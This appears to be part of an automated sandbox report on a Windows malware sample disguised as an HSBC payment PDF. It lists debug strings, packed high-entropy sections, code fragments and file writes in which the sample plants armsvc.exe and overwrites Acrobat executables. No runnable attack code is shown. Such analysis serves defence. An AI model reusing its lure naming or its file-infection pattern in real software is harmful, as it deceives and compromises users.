Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000003.00000003.1603057705.00000000020E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: armsvc.exe, 00000003.00000003.2099260977.0000000000950000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.2102642211.0000000000930000.00000004.00001000.00020000.00000000.sdmp, MavInject32.exe.3.dr
Source:	Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000003.00000003.1429265168.0000000002140000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000003.00000003.1905420538.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1377828312.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1382773109.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000003.00000003.1395339924.00000000021C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000003.00000003.1406013863.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1399327415.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1400193145.00000000021C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000003.00000003.2083654743.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000003.00000003.1887689431.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000003.00000003.1815785170.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\setup.exe.pdb source: setup.exe1.3.dr
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000003.00000003.1839269821.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: armsvc.exe, 00000003.00000003.1406013863.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1399327415.0000000002140000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1400193145.00000000021C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000003.00000003.1893597535.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000003.00000003.1934056151.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000003.00000003.1924019465.0000000000820000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1377828312.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000003.00000003.1941194992.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1962182386.0000000000820000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1381346877.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1380529439.0000000004D60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdb source: armsvc.exe, 00000003.00000003.1507196510.0000000002150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: armsvc.exe, 00000003.00000003.1456084689.0000000002190000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000003.00000003.1456084689.0000000002190000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000003.00000003.1848370378.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AgentService.pdbGCTL source: AgentService.exe.3.dr
Source:	Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1322696814.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1382773109.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x86\ship\licensing\x-none\ospprearm.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OSPPREARM.EXE.3.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1347416428.0000000004160000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1322696814.0000000003E90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000001.00000003.1360363067.0000000004150000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1385180506.00000000021C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000003.00000003.1634476509.00000000009F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdbGCTL source: armsvc.exe, 00000003.00000003.1407889803.0000000002150000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000003.00000003.1413406912.0000000001BB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdbX source: armsvc.exe, 00000003.00000003.1450741177.0000000002190000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: armsvc.exe, 00000003.00000003.2068089448.0000000000930000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: armsvc.exe, 00000003.00000003.1429265168.0000000002140000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000003.00000003.1893597535.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe.3.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000003.00000003.1848370378.0000000000A10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000003.00000003.2068089448.0000000000930000.00000004.00001000.00020000.00000000.sdmp

Source: alg.exe.1.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 1_2_00404B37 LoadLibraryA,GetProcAddress,

1_2_00404B37

Source: msdtc.exe.1.dr

Static PE information: real checksum: 0x2f054 should be: 0x1633da

Source: elevation_service.exe.1.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.1.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.1.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.1.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.1.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.1.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.1.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.1.dr	Static PE information: section name: _RDATA
Source: msdtc.exe.1.dr	Static PE information: section name: .didat
Source: armsvc.exe.1.dr	Static PE information: section name: .didat
Source: alg.exe.1.dr	Static PE information: section name: .didat
Source: FXSSVC.exe.1.dr	Static PE information: section name: .didat
Source: elevation_service.exe0.1.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.1.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.1.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.1.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.1.dr	Static PE information: section name: malloc_h
Source: firefox.exe.3.dr	Static PE information: section name: .00cfg
Source: firefox.exe.3.dr	Static PE information: section name: .freestd
Source: firefox.exe.3.dr	Static PE information: section name: .retplne
Source: firefox.exe.3.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.3.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.3.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.3.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.3.dr	Static PE information: section name: .gehcont
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.3.dr	Static PE information: section name: .gehcont
Source: minidump-analyzer.exe.3.dr	Static PE information: section name: .00cfg
Source: minidump-analyzer.exe.3.dr	Static PE information: section name: .voltbl
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: section name: .retplne
Source: pingsender.exe.3.dr	Static PE information: section name: .00cfg
Source: pingsender.exe.3.dr	Static PE information: section name: .voltbl
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: section name: .retplne
Source: plugin-container.exe.3.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.3.dr	Static PE information: section name: .voltbl
Source: private_browsing.exe.3.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.3.dr	Static PE information: section name: .voltbl
Source: updater.exe.3.dr	Static PE information: section name: .00cfg
Source: updater.exe.3.dr	Static PE information: section name: .voltbl
Source: updater.exe.3.dr	Static PE information: section name: _RDATA
Source: msiexec.exe.3.dr	Static PE information: section name: .didat
Source: MsSense.exe.3.dr	Static PE information: section name: .didat
Source: Spectrum.exe.3.dr	Static PE information: section name: .didat
Source: TieringEngineService.exe.3.dr	Static PE information: section name: .didat
Source: vds.exe.3.dr	Static PE information: section name: .didat
Source: unpack200.exe.3.dr	Static PE information: section name: .00cfg
Source: VSSVC.exe.3.dr	Static PE information: section name: .didat
Source: WmiApSrv.exe.3.dr	Static PE information: section name: .didat
Source: wmpnetwk.exe.3.dr	Static PE information: section name: .didat
Source: SearchIndexer.exe.3.dr	Static PE information: section name: .didat
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.3.dr	Static PE information: section name: _RDATA
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.3.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.3.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.3.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.3.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.3.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.3.dr	Static PE information: section name: malloc_h
Source: setup.exe.3.dr	Static PE information: section name: .00cfg
Source: setup.exe.3.dr	Static PE information: section name: .gxfg
Source: setup.exe.3.dr	Static PE information: section name: .retplne
Source: setup.exe.3.dr	Static PE information: section name: LZMADEC
Source: setup.exe.3.dr	Static PE information: section name: _RDATA
Source: setup.exe.3.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.3.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.3.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.3.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.3.dr	Static PE information: section name: malloc_h

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00428945 push ecx; ret	1_2_00428958
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00402F12 push es; retf	1_2_00402F13
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_009991F4 push 00998E1Ah; ret	1_2_00999153
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0099B108 push 0099B053h; ret	1_2_0099B0FE
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_0099B108 push 0099B682h; ret	1_2_0099B633
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00995D22h; ret	1_2_00995CB0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00995C60h; ret	1_2_00995D09
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00995FAEh; ret	1_2_00995F1A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00995EE7h; ret	1_2_00995F39
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 009962B2h; ret	1_2_0099604C
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 0099631Bh; ret	1_2_0099639A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 009963FFh; ret	1_2_0099642E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 009965D8h; ret	1_2_0099684D
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996C2Dh; ret	1_2_00996C55
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996D50h; ret	1_2_00996CA5
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996FDFh; ret	1_2_00996DE5
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996D86h; ret	1_2_00996E6E
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996EFDh; ret	1_2_00996E8A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00997342h; ret	1_2_00996EAE
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 009971D0h; ret	1_2_00996EE0
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996F98h; ret	1_2_00996F15
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00997059h; ret	1_2_00996F4B
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 0099725Ch; ret	1_2_009970C7
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00997232h; ret	1_2_0099718A
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996CDAh; ret	1_2_009971FE
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996E99h; ret	1_2_009972B4
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996DE7h; ret	1_2_009972BE
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00996D33h; ret	1_2_00997341
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 0099781Ah; ret	1_2_009976FA
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 0099787Ah; ret	1_2_00997715
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 1_2_00998140 push 00998165h; ret	1_2_00998198

Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Static PE information: section name: .reloc entropy: 7.920470153924606
Source: elevation_service.exe.1.dr	Static PE information: section name: .reloc entropy: 7.933963565206776
Source: AppVClient.exe.1.dr	Static PE information: section name: .reloc entropy: 7.923584818911949
Source: FXSSVC.exe.1.dr	Static PE information: section name: .reloc entropy: 7.930074751387284
Source: elevation_service.exe0.1.dr	Static PE information: section name: .reloc entropy: 7.931735945641913
Source: firefox.exe.3.dr	Static PE information: section name: .reloc entropy: 7.926487618554534
Source: minidump-analyzer.exe.3.dr	Static PE information: section name: .reloc entropy: 7.922352327509266
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.3.dr	Static PE information: section name: .reloc entropy: 7.922119328185216
Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.3.dr	Static PE information: section name: .reloc entropy: 7.922124239148214
Source: Aut2exe.exe.3.dr	Static PE information: section name: .rsrc entropy: 7.796135864489979
Source: Aut2exe_x64.exe.3.dr	Static PE information: section name: .rsrc entropy: 7.796259391861451
Source: SensorDataService.exe.3.dr	Static PE information: section name: .reloc entropy: 7.922538973090823
Source: Spectrum.exe.3.dr	Static PE information: section name: .reloc entropy: 7.933297573845488
Source: AgentService.exe.3.dr	Static PE information: section name: .reloc entropy: 7.924375644854446
Source: vds.exe.3.dr	Static PE information: section name: .reloc entropy: 7.928804986901931
Source: VSSVC.exe.3.dr	Static PE information: section name: .reloc entropy: 7.927150085087001
Source: wbengine.exe.3.dr	Static PE information: section name: .reloc entropy: 7.929020192115168
Source: wmpnetwk.exe.3.dr	Static PE information: section name: .reloc entropy: 7.93482034239957
Source: SearchIndexer.exe.3.dr	Static PE information: section name: .reloc entropy: 7.9337744241481705
Source: 7zFM.exe.3.dr	Static PE information: section name: .reloc entropy: 7.919197408916653
Source: 7zG.exe.3.dr	Static PE information: section name: .reloc entropy: 7.91453468895015
Source: identity_helper.exe.3.dr	Static PE information: section name: .reloc entropy: 7.928239249253358
Source: setup.exe.3.dr	Static PE information: section name: .reloc entropy: 7.932283803445015
Source: msedgewebview2.exe.3.dr	Static PE information: section name: .reloc entropy: 7.923554804917644

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
